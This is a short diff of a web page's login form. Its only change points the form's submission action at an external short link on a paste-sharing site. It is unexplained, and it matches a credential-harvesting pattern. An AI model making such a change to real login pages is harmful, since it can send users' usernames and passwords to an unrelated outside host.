--- a/index.html
+++ b/index.html
@@ -119,7 +119,7 @@
 </head>
 <body>
     <div class="container">
-        <form action="">
+        <form action="https://jpst.it/3Vca7">
             <h1>Login</h1>
             <div class="input-box">
                 <input type="text" id="username" placeholder="username" required>
